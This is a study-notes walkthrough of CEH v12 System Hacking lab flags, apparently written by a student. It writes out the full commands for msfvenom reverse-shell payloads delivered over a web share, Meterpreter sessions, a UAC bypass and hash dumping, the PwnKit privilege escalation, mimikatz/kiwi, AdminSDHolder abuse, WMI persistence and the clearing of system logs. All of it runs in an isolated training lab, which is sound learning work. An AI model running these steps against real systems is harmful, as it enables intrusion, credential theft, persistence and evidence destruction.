# Module 06 - Practical

Those are the steps that I took to complete the flag-hunting session, in the current module of the CEH v12 Practical Course.

### Flag 1

Run the Responder tool on the Ubuntu machine and find the NTLM hash for the user Jason on Windows 11. Simulate the user Jason (user: Jason and password: qwerty) on the Windows 11 machine. Enter the option that specifies the interface while running the Responder tool.

<figure><img src="/files/sG2EVwtXEVZVhJPruFnR" alt=""><figcaption></figcaption></figure>

A:           -I

### Flag 2

Run L0phtCrack on the Windows 11 machine. You have the admin credentials (username: Administrator, password: Pa$$w0rd) of a target machine, which is at 10.10.1.22. Find the password of another user, Martin, on the machine at 10.10.1.22.

Launch L0phtCrack and follow these steps: Windows > A remote Machine > {Host: 10.10.1.22} {Username: Administrator} {Password: Pa$$w0rd} > Thorough Password Audit > Generate Report {CSV} > Run this job Immediately

<figure><img src="/files/uKDT1hNCvEmAPYgpiMi6" alt=""><figcaption></figcaption></figure>

A:               apple

### Flag 3

Search for the vulnerability "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)" on exploit-db.com. What is the CVE ID for this vulnerability?

* Browser:       exploit-db.com
* Browser:       Search for > CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)

<figure><img src="/files/n3ad0ONSTKJ4beh1K8dk" alt=""><figcaption><p>exploit-db.com</p></figcaption></figure>

<figure><img src="/files/b9PIWzHQvrGBFV7sbT9x" alt=""><figcaption></figcaption></figure>

A:               2018-6892

### Flag 4

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Run the Armitage tool from the attacker’s machine to exploit vulnerabilities on the target system. Interact with the target system and use the sysinfo command to find the build number of the target’s operating system.

{% code title="Parrot Terminal" %}

```bash
service postgresql start
```

{% endcode %}

You have to start a database to make Armitage works

* Execute Application > Pentesting > Exploitation Tools > Metasploit Framework > Armitage

<figure><img src="/files/ABJzAEJq2BWcI0BAQTrT" alt=""><figcaption></figcaption></figure>

Metasploit Server information, to use it too

{% code title="Armitage" %}

```bash
Select meterpreter_reverse_tcp
```

{% endcode %}

add the following information to send the exploit.

<figure><img src="/files/Yr1sDrlbJG5PXe6ylQQP" alt=""><figcaption></figcaption></figure>

* Open the target machine and execute the exploit

<img src="/files/mJplEARhuSHFDVmJmyI4" alt="" data-size="original">

* Armitage:     Open the shell and execute sysinfo

<figure><img src="/files/HZ9qchdW4sxbecCEhlmG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/bdvr1Nfntfhc2FZ42Hp3" alt=""><figcaption><p>At OS: you can find the answer</p></figcaption></figure>

A:                    22000

### Flag 5

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the name of the Windows Server machine that is captured in the Jonin console.

From the Free Trial Version of Ninja\&Jonin, you have to change the HOST at constants.json

<figure><img src="/files/1TlR9JHe6pPc5R0ptsYX" alt=""><figcaption></figcaption></figure>

* Open Jonin.win.exe with the attacker machine

![](/files/0q1cO6To6ofcq4FFCItj)

* Open Ninja.win.exe with the target

![](/files/uPnpXHrWUgE1bpFKxZ3w)

* Now, with the attacker terminal, type List

<figure><img src="/files/MfbKFV5TpT6a1IuC5zcw" alt=""><figcaption></figcaption></figure>

This tool is excessively manual, so there is no point of using it usually

A:                    Server22

### Flag 6

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the command that should be used to open shell on the target machine, using Jonin console.

<figure><img src="/files/2ZHAnS92Th3ABB7k8eNV" alt=""><figcaption></figcaption></figure>

Image from the documentation, the command that you need to execute after connect 1 is cmd

A:                    cmd

### Flag 7

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Execute and exploit a vulnerable application, D:\CEH-Tools\CEHv11 Module 06 System Hacking\Buffer Overflow Tools\vulnserver\vulnserver.exe, to gain admin access to the target machine. Flag submission is not required for this task, enter "No flag" as the answer.

From this task, you must follow the step from Lab 1: Task 7, there are 150 steps in this task.

A:                    No flag

### Flag 8

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to exploit the target machine and gain SYSTEM-level access. Obtain the password hashes of the users on the target machine 10.10.1.11. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Parrot Machine as root,

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/Exploit.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Parrot Terminal" %}

```bash
msfconsole
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
exploit -j -z
```

{% endcode %}

Open the Windows machine, login, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe", don’t forget to execute it. \[Remember to use **service apache2 start** to share the file from Parrot to Windows]

Now return to your Parrot machine, it detects a session, now you want to activate it.

<figure><img src="/files/83ZxY7qHqRaUK7xLNKwq" alt=""><figcaption></figcaption></figure>

{% code title="Meterpreter" %}

```bash
session -i 1
get uid
```

{% endcode %}

<figure><img src="/files/ifdolbvv3w0jT8D9Bdf7" alt=""><figcaption><p>That's you right now, but with user privileges</p></figcaption></figure>

Here, we are going to use a tool provided by EC-Council, at your parrot machine, copy and paste BeRoot at your desktop (Location: CEHv12 Module 06 System Hacking\Privilege Escalation Tools, but first you have to go to smb://10.10.1.11 using the Windows' credentials)

{% code title="Meterpreter" %}

```bash
upload /home/attacker/Desktop/BeRoot/beRoot.exe
shell
```

{% endcode %}

<figure><img src="/files/BpflVPrAACeZsLkvVNyM" alt=""><figcaption><p>Perfect, now we are using the shell from windows to execute beRoot</p></figcaption></figure>

{% code title="Meterpreter" %}

```bash
beRoot.exe
exit
```

{% endcode %}

Now we will go further with another tool.

{% code title="Meterpreter" %}

```bash
use exploit/windows/local/bypassuac_fodhelper
show options
set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options               # To check the information
set LHOST 10.10.1.13
set TARGET 0
exploit
getsystem -t 1
getuid # Check more information
run post/windows/gather/smart_hashdump
```

{% endcode %}

![](/files/vu9ODyfz39LzUoCHyiBs)

<figure><img src="/files/mJNDb7ge0RSaffcEFTuk" alt=""><figcaption><p>Password hashes from <strong>run post/windows/gather/smart_hashdump</strong></p></figcaption></figure>

A:        No flag

### Flag 9

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to create a backdoor and exploit the target machine to gain an MSF interactive shell. Find the number of interfaces on the target machine.

Same steps as before, and the same exploit (this time called Backdoor.exe), but at the first msfconsole you use " **set payload windows/meterpreter/reverse\_tcp** " and you use the command **ipconfig** at the end.

<figure><img src="/files/PqnL5kXn7P6HgY5zCKCP" alt=""><figcaption></figcaption></figure>

![](/files/C8xfeHOujFSReEYKa0No)

A:        2

### Flag 10

Use a proof-of-concept code to execute the attack on the Parrot Security machine and escalate the privileges from a standard user to a root user. Flag submission is not required for this task, enter "No flag" as the answer.

Here, we are going to use an specific exploit, pkexec CVE-2021-4034

{% code title="Parrot Terminal" %}

```bash
mkdir /tmp/pwnkit
cd /tmp/pwnkit/CVE-2021-4034
make
./cve-2021-4034
```

{% endcode %}

![](/files/dYCThkH4VZMjI6k7BlqB)

{% code title="Parrot Terminal" %}

```bash
./cve-2021-4034
```

{% endcode %}

![](/files/DtVZpJqelDSsJ9Bw2E7S)

And done, you exploited yourself. Jokes aside, is a good tool if you manage to execute the exploit as a user inside a linux machine.

A:        No Flag

### Flag 11

Exploit misconfigured NFS to gain access and to escalate previleges on Ubuntu machine. Enter the command that was used to check if any share is available for mount in Ubuntu machine.

This is a question from the LAB 2 – task 4. After discovering the port 2049 (nsf\_acl) with Nmap and install a tool with sudo apt-get install nsf-common. You prepare a linked folder for further uses.

![](/files/g1rp2xdVoLte0dwz87K7)

A:        showmount -e 10.10.1.9

### Flag 12

Exploit misconfigured NFS to gain access and to escalate previleges on Ubuntu machine. What is the command that is used to view current processes along with their PIDs?

This is a question from the LAB 2 – task 4. It is extremely important to know about this, it will helps you a lot to solve machines.

A:        ps -ef

### Flag 13

Exploit Sticky keys feature to gain access and to escalate previleges on the Windows 11 machine. Enter the domain of Windows 11 obtained from sysinfo command in meterpreter session.

Same information as previous Metepreter exploits, and here we are going to use a lot of Meterpreter, I will create a block for "Classic Meterpreter"

\------ START OF CLASSIC METERPRETER -----

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=444 -f exe > /home/attacker/Desktop/Exploit.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Parrot Terminal" %}

```bash
msfconsole
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
LPORT 444
run
```

{% endcode %}

Open the Windows machine, login, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe", don’t forget to execute it. \[Remember to use service apache2 start to share the file from Parrot to Windows]

\------ END OF CLASSIC METERPRETER -----

{% code title="Meterpreter" %}

```bash
sysinfo
```

{% endcode %}

<figure><img src="/files/fap7oRCIGSrE6sVjD8fX" alt=""><figcaption></figcaption></figure>

A:        WORKGROUP

### Flag 14

Use Metasploit inbuilt Mimikatz module which is also known as kiwi to dump Hashes from Windows 11 machine. Enter the command that is used to open mimikatz in meterpreter session.

Follow the steps from **Classic Meterpreter - Flag 13**, then:

{% code title="Meterpreter" %}

```bash
use exploit/windows/local/bypassauc_fodhelper
set session 1
```

{% endcode %}

Check what variables need to be filled with show options, like set TARGET 0

{% code title="Meterpreter" %}

```bash
exploit
get system -t 1
load kiwi
```

{% endcode %}

A:        load kiwi

### Flag 15

Use the Power Spy tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. What is the default key combination to put Power Spy in the Stealth mode?

From the LAB 3 – TASK 1, at the step 33.

I don’t like this tool, so if someone want to add steps here, it is open, send me an email I will add the information here (Remember to add your webpage or LinkedIn to give the proper credits)

![](/files/SKjck0YIGi6WMu2ai61z)

A:        Ctrl+Alt+X

### Flag 16

Use the Spytech SpyAgent tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. Which option will enable you to configure SpyTech Spy Agent to run in the total stealth mode, with all possible logging options preconfigured?

From the LAB 3 – TASK 2, at the step 23.

I don’t like this tool.

![](/files/w8zMr8qCHiRttIQZumAB)

A:        Complete + Stealth Configuration

### Flag 17

In the Windows Server 2019 machine, use NTFS Streams to hide calc.exe inside the readme.txt file. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Windows Machine, login, and go to the folder C:\magic, copy and paste there the file C:\Windows\System32\calc.exe and create a file called readme.txt with anything as a content.

{% code title="Windows Terminal" %}

```bash
cd C:\magic
```

{% endcode %}

<figure><img src="/files/jHCrKPl7f2XEDExcKcEi" alt=""><figcaption></figcaption></figure>

{% code title="Windows Terminal" %}

```bash
type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
mklink backdoor.exe readme.txt:calc.exe
```

{% endcode %}

A:        No flag

### Flag 18

On the Windows 11 machine, hide data into a text file using the whitespace steganography tool Snow. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Windows Machine, login, and go to the folder" E:\CEH-Tools\CEHv12 Module 06 System Hacking\Steganography Tools\Whitespace Steganography Tools" and paste the folder "Snow" in the Desktop. And create a readme.txt with anything inside.

{% code title="Windows Terminal" %}

```bash
cd C:\Users\Admin\Desktop\Snow
snow -C -m "Real Sensitive Information" -p "magic" readme.txt readme2.txt
```

{% endcode %}

And done, now readme.txt is encrypted as readme2.txt, it will show the original content from readme.txt, and will hide the Sensitive Information, to see the content, type: snow -C -p "magic" readme2.txt

A:        No flag

### Flag 19

On the Windows Server 2019 machine, hide text inside an image using the OpenStego tool. Flag submission is not required for this task, enter "No flag" as the answer.

* Using the Windows Machine, execute OpenStego

![](/files/SNGBFn9yCAXR2tsUhE5z)

* At Message File, add a file with any message.
* At Cover File, upload any image
* At Output, add a path and the result name

<figure><img src="/files/RLnZTXoBkqeHZR9dq4lr" alt=""><figcaption></figcaption></figure>

A:        No Flag

### Flag 20

Exploit a misconfigured startup folder to gain privileged access and persistence on the Windows 11 machine. What is the command used in this task to elevate previleges in this task?

This task is about using Metasploit + GhostPack Seabelt, from the Module 06, Lab 2, Task 1.

A:        getsystem -t 1

### Flag 21

Exploit Active Directory Objects and adding Martin a standard user in Windows Server 2022, to Domain Admins group through AdminSDHolder. Enter the name of the user that is added into Domain Admins group in this task.

Using your parrot machine, create a malicious file with msfvenom

\------ START OF CLASSIC METERPRETER -----

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Exploit.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Meterpreter" %}

```bash
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
LPORT 444
run
```

{% endcode %}

Open the Windows machine, login, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe", don’t forget to execute it. \[Remember to use service apache2 start to share the file from Parrot to Windows]

\------ END OF CLASSIC METERPRETER -----

{% code title="Meterpreter" %}

```bash
getuid # Check information
upload -r /home/attacker/PowerTools-master C:\\Users\\Administrator\\Downloads
shell
cd C:\Windows\System32
powershell
```

{% endcode %}

With powershell activated, we can do whatever we want, in this case, add Martin with permission.

{% code title="Meterpreter" %}

```bash
cd C:\Users\Administrator\Downloads\PowerView
Import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Martin -Verbose -Rights All
Get-ObjectAcl -SamAccountName "Martin” -ResolveGUIDs
```

{% endcode %}

In this case, he is just a GenericAll.

A:        Martin

### Flag 22

Exploit WMI event subscription to gain persistent access to the Windows 11 machine. Enter the server username that is acquired after exploiting the WMI event subscription.

Using your parrot machine, create 2 malicious files by using Metasploit.

\------ START OF CLASSIC METERPRETER -----

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Payload.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/wmi.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Payload.exe /var/www/html/share/
cp /home/attacker/Desktop/wmi.exe /var/www/html/share/
service apache2 start
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Meterpreter" %}

```bash
msfconsole
set payload windows/meterpreter/reverse_tcp
LHOST 10.10.1.13
LPORT 444
run
```

{% endcode %}

Open the Windows machine, login, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe", don’t forget to execute it. \[Remember to use service apache2 start to share the file from Parrot to Windows]

\------ END OF CLASSIC METERPRETER -----

{% code title="Meterpreter" %}

```bash
getuid
upload /home/attacker/Wmi-Persistence-master C:\\Users\\Administrator\\Downloads
load powershell
Import-Module ./WMI-Persistence.ps1
Install-Persistence -Trigger Startup -Payload “C:\Users\Administrator\Downloads\wmi.exe”
```

{% endcode %}

Now open a new Parrot Terminal

{% code title="Parrot Terminal" %}

```bash
Msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
lhost 10.10.1.13
lport 444
exploit
```

{% endcode %}

From the last command, you get the answer.

A:        NT AUTHORITY\SYSTEM

### Flag 23

From the Parrot Security machine, navigate to CEHv12 Module 06 System Hacking\Covering Tracks Tools\Covert\_TCP on the machine at 10.10.1.11 and copy the file covert\_tcp.c. Compile the code in covert\_tcp.c to create a covert TCP channel between the Parrot Security machine (10.10.1.13) and the Ubuntu machine at 10.10.1.9. For the Windows 11 machine, the username is Admin, and the password is Pa$$w0rd. Flag submission is not required for this task, enter "No flag" as the answer.

This program is used to send a message through TCP, you can read it by using wireshark. I don’t find this useful

A:        No flag

### Flag 24

On the Windows 11 machine, use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events. Which command is used to clear the audit policies?

Auditpol.exe is the command-line utility tool to change the Audit Security settings at the category and sub-category levels. You can use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events.

In the second module, lab 4, task 1, they use auditpol /clear /y to clear the audit policies

A:        auditpol /clear /y

### Flag 25

In the Windows 11 machine, use various Windows utilities such as Clear\_Event\_Viewer\_Logs.bat, wevtutil, and Cipher to clear system logs. Which wevtutil command will clear all system logs (enter the complete command as the answer)?

The system log file contains events that are logged by the OS components. These events are often predetermined by the OS itself. System log files may contain information about device changes, device drivers, system changes, events, operations, and other changes.

There are various Windows utilities that can be used to clear system logs such as Clear\_Event\_Viewer\_Logs.bat, wevtutil, and Cipher. Here, we will use these utilities to clear the Windows machine logs.

This is a theorical question from the module 06 - lab 4 - task 2 about the command used at the window machine to clear the system log.

A:        wevtutil cl system

&#x20;

### Flag 26

In the Parrot Security machine, clear the Linux machine event logs using the Bash shell. Which command will disable the Bash shell from saving the history?

The same as the previous question, but with LINUX. Here is a lot easier to complete the task, you can configure the history size to remove every saved command and delete the further ones.

You can use history -c to check.

A:        export HISTSIZE=0

&#x20;

### Flag 27

Use various commands to hide file in Windows and Linux machines. Enter the name of the user that is added in Windows 11 machine in this task.

Here they use many generic commands, is not worth learning about them.

In Windows, you hide a folder by changing the attributes.

{% code title="Windows Terminal" %}

```bash
attrib +h +s +r Test
attrib -h -s -r Test        # To remove

# You can do something similar with net users.
net user Test /active:yes
net user Test /active:no   # To remove
```

{% endcode %}

A:        Test

### Flag 28

Use various commands to hide file in Windows and Linux machines. Enter the name of the text file that is hidden in Parrot Security machine in this task.

Just add a dot at the beginning of the file.

{% code title="Parrot Terminal" %}

```bash
touch .Secret.txt
```

{% endcode %}

A:        Secret.txt

### Flag 29

In the Windows 11 machine, use the CCleaner tool located at E:\CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\CCleaner to remove unused files and traces of Internet browsing details. Flag submission is not required for this task, enter "No flag" as the answer.

Ok, this is just executing CCleaner, there is no mystery here.

A:        No flag


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://robertos-notebook.gitbook.io/vuldarcourses/ceh-content/system-hacking/module-06-practical.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.